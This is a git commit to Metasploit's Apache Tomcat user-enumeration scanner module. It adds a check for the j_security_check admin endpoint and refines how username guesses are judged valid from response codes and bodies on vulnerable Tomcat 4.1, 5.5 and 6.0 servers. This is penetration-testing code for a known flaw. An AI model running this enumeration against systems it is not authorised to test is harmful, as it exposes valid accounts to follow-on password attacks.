[FixRM 6264] Check required vulnerable component before testing

tomcat_enum requires the admin web app package for it to work, but by default many Apache Tomcat don't actually have this. The module should check that first before trying usernames. [FixRM 6264], see: http://dev.metasploit.com/redmine/issues/6264 I also made changes to do_login in order to verify successful/bad attempts more specific.
2013-08-16 15:45:23 -05:00 · 2013-08-16 15:45:23 -05:00 · a94c6aa72b
parent 85b050112a
commit a94c6aa72b
1 changed files with 42 additions and 11 deletions
--- a/modules/auxiliary/scanner/http/tomcat_enum.rb
+++ b/modules/auxiliary/scanner/http/tomcat_enum.rb
@ -20,8 +20,11 @@ class Metasploit3 < Msf::Auxiliary
 		super(
 			'Name'           => 'Apache Tomcat User Enumeration',
 			'Description'    => %q{
-					Apache Tomcat user enumeration utility, for Apache Tomcat servers prior to version
-				6.0.20, 5.5.28, and 4.1.40.
+					This module enumerates Apache Tomcat's usernames via malformed requests to
+				j_security_check, which can be found in the web administration package. It should
+				work against Tomcat servers 4.1.0 - 4.1.39, 5.5.0 - 5.5.27, and 6.0.0 - 6.0.18.
+				Newer versions no longer have the "admin" package by default. The 'admin' package
+				is no longer provided for Tomcat 6 and later versions.
 			},
 			'Author'         =>
 				[
@ -54,7 +57,23 @@ class Metasploit3 < Msf::Auxiliary
 		"http://#{vhost}:#{rport}#{uri}"
 	end

+	def has_j_security_check?
+		print_status("#{target_url} - Checking j_security_check...")
+		res = send_request_raw({'uri' => normalize_uri(datastore['URI'])})
+		if res
+			print_status("#{target_url} - Server returned: #{res.code.to_s}")
+			return true if res.code == 200 or res.code == 302
+		end
+
+		false
+	end
+
 	def run_host(ip)
+		unless has_j_security_check?
+			print_error("#{target_url} - Unable to enumerate users with this URI")
+			return
+		end
+
 		@users_found = {}

 		each_user_pass { |user,pass|
@ -85,15 +104,18 @@ class Metasploit3 < Msf::Auxiliary
 					'data'    => post_data,
 				}, 20)

-			if res
-				if res.code == 200
-					if res.headers['Set-Cookie']
-						vprint_status("#{target_url} - Apache Tomcat #{user} not found ")
-					else
-						print_good("#{target_url} - Apache Tomcat #{user} found ")
-						@users_found[user] = :reported
-					end
-				end
+			if res and res.code == 200 and res.headers['Set-Cookie']
+				vprint_error("#{target_url} - Apache Tomcat #{user} not found ")
+			elsif res and res.body =~ /invalid username/i
+				vprint_error("#{target_url} - Apache Tomcat #{user} not found ")
+			elsif res and res.code == 500
+				# Based on: http://archives.neohapsis.com/archives/bugtraq/2009-06/0047.html
+				vprint_good("#{target_url} - Apache Tomcat #{user} found ")
+				@users_found[user] = :reported
+			elsif res and res.body.empty? and res.headers['Location'] !~ /error\.jsp$/
+				# Based on: http://archives.neohapsis.com/archives/bugtraq/2009-06/0047.html
+				print_good("#{target_url} - Apache Tomcat #{user} found ")
+				@users_found[user] = :reported
 			else
 				print_error("#{target_url} - NOT VULNERABLE")
 				return :abort
@ -106,3 +128,12 @@ class Metasploit3 < Msf::Auxiliary
 	end

 end
+
+=begin
+
+If your Tomcat doesn't have the admin package by default, download it here:
+http://archive.apache.org/dist/tomcat/	
+
+The package name should look something like: apache-tomcat-[version]-admin.zip
+
+=end